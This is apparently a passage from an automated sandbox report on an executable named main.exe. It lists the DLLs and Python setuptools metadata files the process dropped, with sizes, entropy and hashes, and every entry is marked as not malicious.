                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):39696
                                                                                                                                                                                                                                                      Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                                      MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                                      SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                                      SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                                      SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):787224
                                                                                                                                                                                                                                                      Entropy (8bit):5.609561366841894
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
                                                                                                                                                                                                                                                      MD5:19A2ABA25456181D5FB572D88AC0E73E
                                                                                                                                                                                                                                                      SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
                                                                                                                                                                                                                                                      SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
                                                                                                                                                                                                                                                      SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13312
                                                                                                                                                                                                                                                      Entropy (8bit):5.024031964823461
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:atwEf9apwEHklnwEYCm/tJD19g3+ifpWcqguO:n6PS9J8uA2gu
                                                                                                                                                                                                                                                      MD5:A33FFBBC2D260A7C2370E69AB5BA4064
                                                                                                                                                                                                                                                      SHA1:B9D8D5C706A5A516A6F60877792C60795BCD3C90
                                                                                                                                                                                                                                                      SHA-256:FB9A9F06BD313298934651FD84583FEC6A3D3C78BBCF982E33399B6E6648DD7C
                                                                                                                                                                                                                                                      SHA-512:74FA21688EEA31DDEC654CFA205F02FE064C225061428982BB0E9E0F0758003440780C9C959864E1660FD729935D34DFD2BAB25B9ED703504DDFF9F5AB9F4D0A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):285960
                                                                                                                                                                                                                                                      Entropy (8bit):5.461065382482897
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:4zxBXiKg54fss7LLiIwUaDfS7DfaNX4mDBGMX0Qv77u:2g8L5wRDfS7Dfmoc0cX77u
                                                                                                                                                                                                                                                      MD5:B7A9AD530A12FED36FD741152AE5681B
                                                                                                                                                                                                                                                      SHA1:B7E231D6B54B56C25AEE9FE2D2FD6CE02202FCB0
                                                                                                                                                                                                                                                      SHA-256:AA2C96DD541A3A97789C3BD5F26C0E236B2DF84658995BF4315F69CC0508A76B
                                                                                                                                                                                                                                                      SHA-512:3F790A40BF638C2ED64E2D400FE89AD08DAAF4B9FAE98002062BF577D39A089E09A2C8CAA4698B35C4893D5369248BBE709CA52B1314E087E178F666DC1E12D8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:MSVC program database ver 7.00, 4096*579 bytes
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3569664
                                                                                                                                                                                                                                                      Entropy (8bit):3.5032339840174664
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:Czce3qZ3MHby9J1a8HbkLtwFgG1vgFNWFPGJU0CsQCX9vanmI+bFuABqg5FLU:C4F1iby9J1fHw5xJIiVanmv7U
                                                                                                                                                                                                                                                      MD5:DB3980C377DC1940CA2507933B7E9ACB
                                                                                                                                                                                                                                                      SHA1:61DE86992BD29D65011C9F4E94A695A204D995CB
                                                                                                                                                                                                                                                      SHA-256:41BCB2B3DEA321B5DCFA107E8DB8842686B61ADE534F802E00ACDF365EC2B2D7
                                                                                                                                                                                                                                                      SHA-512:AD2D72EA3A2ACB8EFB02E5E1FB23BF03B32F46C4E077B184716AEC7435D563F3021D7C1A01307E0CD37EB1A5B6237F08213F8D454B62293060F2599C9E303B90
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):67072
                                                                                                                                                                                                                                                      Entropy (8bit):5.909516720609218
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:AGsHmR02IvVxv7WCyKm7c5Th4vBHTOvyyaZE:AYIvryCyKx5Th4v5OvyyO
                                                                                                                                                                                                                                                      MD5:7A9632D241AD8B97BB50E8EF6DAC1CA6
                                                                                                                                                                                                                                                      SHA1:29F0D5DE91A84FA58CF45FD134358254B7DA12ED
                                                                                                                                                                                                                                                      SHA-256:DD0CCDEECA681645025CA0F562EA45B5B17A1EBFCF1688CD0647A950A2992E2F
                                                                                                                                                                                                                                                      SHA-512:CA6AE6493961F722C07B2FACF272CAF428FD6BCD51A01C34271A18C5D898409C400E50BBAAB2771CBDC94B20041668BE8137242995C9096E511F635F1EA80BB9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):199448
                                                                                                                                                                                                                                                      Entropy (8bit):6.367371798703565
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:VK/lLDYZL1p13eiG7eDT9AmNfLVuOgOgOgOgOgOgNltwZSm:VglkZHLVuOgOgOgOgOgOgN0sm
                                                                                                                                                                                                                                                      MD5:79561BC9F70383F8AE073802A321ADFB
                                                                                                                                                                                                                                                      SHA1:5F378F47888E5092598C20C56827419D9F480FA7
                                                                                                                                                                                                                                                      SHA-256:C7C7564F7F874FB660A46384980A2CF28BC3E245CA83628A197CCF861EAB5560
                                                                                                                                                                                                                                                      SHA-512:476C839F544B730C5B133E2AE08112144CAC07B6DFB8332535058F5CBF54CE7ED4A72EFB38E6D56007AE755694B05E81E247D0A10210C993376484A057F2217C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):67352
                                                                                                                                                                                                                                                      Entropy (8bit):6.1463412690318515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:Iw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJS0:v/5k8cnzeJWJIYL0D7Sy7x9
                                                                                                                                                                                                                                                      MD5:7E07C63636A01DF77CD31CFCA9A5C745
                                                                                                                                                                                                                                                      SHA1:593765BC1729FDCA66DD45BBB6EA9FCD882F42A6
                                                                                                                                                                                                                                                      SHA-256:DB84BC052CFB121FE4DB36242BA5F1D2C031B600EF5D8D752CF25B7C02B6BAC6
                                                                                                                                                                                                                                                      SHA-512:8C538625BE972481C495C7271398993CFE188E2F0A71D38FB51EB18B62467205FE3944DEF156D0FF09A145670AF375D2FC974C6B18313FA275CE6B420DECC729
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5800216
                                                                                                                                                                                                                                                      Entropy (8bit):6.092588839205304
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:49152:4kkzsT7AzjUaeLdj6UTSGKzuePQaOviRvYD4Kus0GYr3jDKPpWjrM06biCnCIS7E:wsgreBltVe1EsJ5CrSQHyMAwdp09U
                                                                                                                                                                                                                                                      MD5:387BB2C1E40BDE1517F06B46313766BE
                                                                                                                                                                                                                                                      SHA1:601F83EF61C7699652DEC17EDD5A45D6C20786C4
                                                                                                                                                                                                                                                      SHA-256:0817A2A657A24C0D5FBB60DF56960F42FC66B3039D522EC952DAB83E2D869364
                                                                                                                                                                                                                                                      SHA-512:521CDE6EAA5D4A2E0EF6BBFDEA50B00750AE022C1C7BD66B20654C035552B49C9D2FAC18EF503BBD136A7A307BDEB97F759D45C25228A0BF0C37739B6E897BAD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):670208
                                                                                                                                                                                                                                                      Entropy (8bit):6.035999626973864
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:ngSkceIv3zBJBQoXNi4LCQqAOffa1tpd5g:gSkc/v3zB9NiEWfa
                                                                                                                                                                                                                                                      MD5:31C1BF2ACA5DF417F6CE2618C3EEFE7E
                                                                                                                                                                                                                                                      SHA1:4C2F7FE265FF28396D03BA0CAB022BBD1785DBF2
                                                                                                                                                                                                                                                      SHA-256:1DAF7C87B48554F1481BA4431102D0429704832E42E3563501B1FFDD3362FCD1
                                                                                                                                                                                                                                                      SHA-512:5723145F718CC659ADD658BA545C5D810E7032842907BAB5C2335E3DE7F20FE69B58AA42512FD67EA8C6AA133E59E0C26BD90700BDD0D0171AF6C1E1C73A2719
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):134656
                                                                                                                                                                                                                                                      Entropy (8bit):5.999117329459055
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:kLcVKY3tOSjPenBttgY/r06Yr27vJmxETaTX7wevxJ:kLcVKY3tOWPxY/rkqzJmxEmTXMev
                                                                                                                                                                                                                                                      MD5:5D67ABF69A8939D13BEFB7DE9889B253
                                                                                                                                                                                                                                                      SHA1:BCBBF88C05732D4E1E3811FD312425C1C92018D1
                                                                                                                                                                                                                                                      SHA-256:615EB8A75F9ED9371A59DA8F31E27EE091C013DB0B9164A5124CA0656EA47CB4
                                                                                                                                                                                                                                                      SHA-512:FA34EB05996C41F23524A8B4F1FAED0BDD41224D8E514AA57D568A55D2044C32798C1357F22C72AD79FD02948CAAD89B98B8E9B0AD2927E4A0169739335271CE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):30488
                                                                                                                                                                                                                                                      Entropy (8bit):6.578083215899035
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:oG0ICxeeLn0XHqYK/57AvB0KJIYQGFHQIYiSy1pCQuRWAM+o/8E9VF0NyMl+:tieOGHqlGxJIYQGp5YiSyvHAMxkEN
                                                                                                                                                                                                                                                      MD5:E4AB524F78A4CF31099B43B35D2FAEC3
                                                                                                                                                                                                                                                      SHA1:A9702669EF49B3A043CA5550383826D075167291
                                                                                                                                                                                                                                                      SHA-256:BAE0974390945520EB99AB32486C6A964691F8F4A028AC408D98FA8FB0DB7D90
                                                                                                                                                                                                                                                      SHA-512:5FCCFB3523C87AD5AB2CDE4B9C104649C613388BC35B6561517AE573D3324F9191DD53C0F118B9808BA2907440CBC92AECFC77D0512EF81534E970118294CDEE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                                                                      Entropy (8bit):1.5
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                      MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                      SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                      SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                      SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:pip.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1050
                                                                                                                                                                                                                                                      Entropy (8bit):5.072538194763298
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1rmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:1aJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                                      MD5:7A7126E068206290F3FE9F8D6C713EA6
                                                                                                                                                                                                                                                      SHA1:8E6689D37F82D5617B7F7F7232C94024D41066D1
                                                                                                                                                                                                                                                      SHA-256:DB3F0246B1F9278F15845B99FEC478B8B506EB76487993722F8C6E254285FAF8
                                                                                                                                                                                                                                                      SHA-512:C9F0870BC5D5EFF8769D9919E6D8DDE1B773543634F7D03503A9E8F191BD4ACC00A97E0399E173785D1B65318BAC79F41D3974AE6855E5C432AC5DACF8D13E8A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Copyright Jason R. Coombs..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTW
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6301
                                                                                                                                                                                                                                                      Entropy (8bit):5.107162422517841
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:W4rkAIG0wRg8wbNDdq6T9927uoU/GBpHFwTZ:Sq0wRg8wbNDdBh927uoU/GBRFi
                                                                                                                                                                                                                                                      MD5:9E59BD13BB75B38EB7962BF64AC30D6F
                                                                                                                                                                                                                                                      SHA1:70F6A68B42695D1BFA55ACB63D8D3351352B2AAC
                                                                                                                                                                                                                                                      SHA-256:80C7A3B78EA0DFF1F57855EE795E7D33842A0827AA1EF4EE17EC97172A80C892
                                                                                                                                                                                                                                                      SHA-512:67AC61739692ECC249EBDC8F5E1089F68874DCD65365DB1C389FDD0CECE381591A30B99A2774B8CAAA00E104F3E35FF3745AFF6F5F0781289368398008537AE7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Metadata-Version: 2.1.Name: setuptools.Version: 65.5.0.Summary: Easily download, build, install, upgrade, and uninstall Python packages.Home-page: https://github.com/pypa/setuptools.Author: Python Packaging Authority.Author-email: distutils-sig@python.org.Project-URL: Documentation, https://setuptools.pypa.io/.Project-URL: Changelog, https://setuptools.pypa.io/en/stable/history.html.Keywords: CPAN PyPI distutils eggs package management.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: Topic :: System :: Systems Administration.Classifier: Topic :: Utilities.Requires-Python: >=3.7.License-File: LICENSE.Provides-Extra: certs.Provides-Extra: docs.Requi
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):37694
                                                                                                                                                                                                                                                      Entropy (8bit):5.555787611309118
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:vSzcBlShgRUhbul9nXJkpIVh498WjXYH0+5+E/8mrnaDoaQP7IOQRJqxBPgof2yd:vc853yQXYAY8AKCT9r2/GsIVxE9Im
                                                                                                                                                                                                                                                      MD5:087F72A04BB085627494651E36C4C513
                                                                                                                                                                                                                                                      SHA1:1E39070E246F91D8926268A033C6F584E629E2DE
                                                                                                                                                                                                                                                      SHA-256:BFB77A968E06417BD37023BF1A2D7F1AAE9D8E74231665D6699D5BB82BDBD7B0
                                                                                                                                                                                                                                                      SHA-512:39CE042A20324C6B63A192D70E56B36318C45D04B810A6BD333D1D40B6DAAD947AFB9156C003BC86C700A59F0F25753416D754DA06C808814920F92582CB6058
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:_distutils_hack/__init__.py,sha256=TSekhUW1fdE3rjU3b88ybSBkJxCEpIeWBob4cEuU3ko,6128.._distutils_hack/__pycache__/__init__.cpython-311.pyc,,.._distutils_hack/__pycache__/override.cpython-311.pyc,,.._distutils_hack/override.py,sha256=Eu_s-NF6VIZ4Cqd0tbbA5wtWky2IZPNd8et6GLt1mzo,44..distutils-precedence.pth,sha256=JjjOniUA5XKl4N5_rtZmHrVp0baW_LoHsN0iPaX10iQ,151..pkg_resources/__init__.py,sha256=fT5Y3P1tcSX8sJomClUU10WHeFmvqyNZM4UZHzdpAvg,108568..pkg_resources/__pycache__/__init__.cpython-311.pyc,,..pkg_resources/_vendor/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pkg_resources/_vendor/__pycache__/__init__.cpython-311.pyc,,..pkg_resources/_vendor/__pycache__/appdirs.cpython-311.pyc,,..pkg_resources/_vendor/__pycache__/zipp.cpython-311.pyc,,..pkg_resources/_vendor/appdirs.py,sha256=MievUEuv3l_mQISH5SF0shDk_BNhHHzYiAPrT3ITN4I,24701..pkg_resources/_vendor/importlib_resources/__init__.py,sha256=evPm12kLgYqTm-pbzm60bOuumumT8IpBNWFp0uMyrzE,506..pkg_resources/_vendor/importli
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):92
                                                                                                                                                                                                                                                      Entropy (8bit):4.820827594031884
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RtEeX7MWcSlViZHKRRP+tPCCfA5S:RtBMwlViojWBBf
                                                                                                                                                                                                                                                      MD5:4D57030133E279CEB6A8236264823DFD
                                                                                                                                                                                                                                                      SHA1:0FDC3988857C560E55D6C36DCC56EE21A51C196D
                                                                                                                                                                                                                                                      SHA-256:1B5E87E00DC87A84269CEAD8578B9E6462928E18A95F1F3373C9EEF451A5BCC0
                                                                                                                                                                                                                                                      SHA-512:CD98F2A416AC1B13BA82AF073D0819C0EA7C095079143CAB83037D48E9A5450D410DC5CF6B6CFF3F719544EDF1C5F0C7E32E87B746F1C04FE56FAFD614B39826
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.37.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2740
                                                                                                                                                                                                                                                      Entropy (8bit):4.540737240939103
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:lELcZDy3g6ySDsm90rZh2Phv4hhpTqTog:yLAP8arZoP94hTTqcg
                                                                                                                                                                                                                                                      MD5:D3262B65DB35BFFAAC248075345A266C
                                                                                                                                                                                                                                                      SHA1:93AD6FE5A696252B9DEF334D182432CDA2237D1D
                                                                                                                                                                                                                                                      SHA-256:DEC880BB89189B5C9B1491C9EE8A2AA57E53016EF41A2B69F5D71D1C2FBB0453
                                                                                                                                                                                                                                                      SHA-512:1726750B22A645F5537C20ADDF23E3D3BAD851CD4BDBA0F9666F9F6B0DC848F9919D7AF8AD8847BD4F18D0F8585DDE51AFBAE6A4CAD75008C3210D17241E0291
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[distutils.commands].alias = setuptools.command.alias:alias.bdist_egg = setuptools.command.bdist_egg:bdist_egg.bdist_rpm = setuptools.command.bdist_rpm:bdist_rpm.build = setuptools.command.build:build.build_clib = setuptools.command.build_clib:build_clib.build_ext = setuptools.command.build_ext:build_ext.build_py = setuptools.command.build_py:build_py.develop = setuptools.command.develop:develop.dist_info = setuptools.command.dist_info:dist_info.easy_install = setuptools.command.easy_install:easy_install.editable_wheel = setuptools.command.editable_wheel:editable_wheel.egg_info = setuptools.command.egg_info:egg_info.install = setuptools.command.install:install.install_egg_info = setuptools.command.install_egg_info:install_egg_info.install_lib = setuptools.command.install_lib:install_lib.install_scripts = setuptools.command.install_scripts:install_scripts.rotate = setuptools.command.rotate:rotate.saveopts = setuptools.command.saveopts:saveopts.sdist = setuptools.command.sdist:sdist.seto
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                      Entropy (8bit):3.9115956018096876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:3Wd+Nt8AfQYv:3Wd+Nttv
                                                                                                                                                                                                                                                      MD5:789A691C859DEA4BB010D18728BAD148
                                                                                                                                                                                                                                                      SHA1:AEF2CBCCC6A9A8F43E4E150E7FCF1D7B03F0E249
                                                                                                                                                                                                                                                      SHA-256:77DC8BDFDBFF5BBAA62830D21FAB13E1B1348FF2ECD4CDCFD7AD4E1A076C9B88
                                                                                                                                                                                                                                                      SHA-512:BC2F7CAAD486EB056CB9F68E6C040D448788C3210FF028397CD9AF1277D0051746CAE58EB172F9E73EA731A65B2076C6091C10BCB54D911A7B09767AA6279EF6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:_distutils_hack.pkg_resources.setuptools.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1540888
                                                                                                                                                                                                                                                      Entropy (8bit):6.5843112373819705
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:ozx+dvHgdXZW1s4gLLk56J0s3XyBh4mqWvqS/cm4ynZ3YSoXkMEKp:ApW1cd0s3CMmqWSS/ci3YSTk
                                                                                                                                                                                                                                                      MD5:89C2845BD090082406649F337C0CCA62
                                                                                                                                                                                                                                                      SHA1:956736454F9C9E1E3D629C87D2C330F0A4443AE9
                                                                                                                                                                                                                                                      SHA-256:314BBA62F4A1628B986AFC94C09DC29CDAF08210EAE469440FBF46BCDB86D3FD
                                                                                                                                                                                                                                                      SHA-512:1C467A7A3D325F0FEBB0C6A7F8F7CE49E4F9E3C4514E613352EF7705A338BE5E448C351A47DA2FB80BF5FC3D37DBD69E31C935E7FF58EAD06B2155A893728A82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1140504
                                                                                                                                                                                                                                                      Entropy (8bit):5.437116185038964
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:bdYbfjwR6nbYonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD85U:RYbM10IDJcjEwPgPOG6Xyd4685U
                                                                                                                                                                                                                                                      MD5:FD9132F966EE6D214E0076BF0492FB30
                                                                                                                                                                                                                                                      SHA1:89B95957F002BF382435D015E26962A42032CB97
                                                                                                                                                                                                                                                      SHA-256:37C68617FA02A2CADCED17EF724E2D450EF12A8A37215DA789A4679FDE1C5C02
                                                                                                                                                                                                                                                      SHA-512:E35729ABC45E5561AAE1FB9E0E7C711DD7D3C1491520AA5C44FCC50C955F549F81D90897959327E930D02A5356AFE08D6195ADF002C87801A7A11235670639B5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14848
                                                                                                                                                                                                                                                      Entropy (8bit):5.113812591033072
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:rCm72PEO1jIUs0YqEcPbF55UgCWV4rofnDPdRD0hvHvcqvn7ycIt/G/:rardA0Bzx14r6nDrOhv+O/
                                                                                                                                                                                                                                                      MD5:B58CA169FDCFFAB726391D3906DD9A4E
                                                                                                                                                                                                                                                      SHA1:C4BB8DA84A5D9C31D0ACB7A4127F55E696F414DF
                                                                                                                                                                                                                                                      SHA-256:1A8DCDBD730166889C03FAF285DC1DD9F16090DFE81043D80A9D6308300EBAC9
                                                                                                                                                                                                                                                      SHA-512:AA23DEBF80D89A40677D1BF1C7C6C3445A79E76419865B86D0D6A605656478067EBEA2752348FCF77D583D2E5DCD284DA7F55F751D6441E647565DA77F982966
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):133120
                                                                                                                                                                                                                                                      Entropy (8bit):5.849201651779307
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:znvpE3JJ/Q7DspOCQUUU40Oc3lRVFhLaNzvBii7qQvmwCoY9LQPe:T4xG4pOCQUUU4rWlRVgv5qQSoY9
                                                                                                                                                                                                                                                      MD5:D02300D803850C3B0681E16130FECEE4
                                                                                                                                                                                                                                                      SHA1:6411815E2A908432A640719ECFE003B43BBBA35C
                                                                                                                                                                                                                                                      SHA-256:B938C8CD68B15EC62F053045A764D8DD38162A75373B305B4CF1392AC05DF5F9
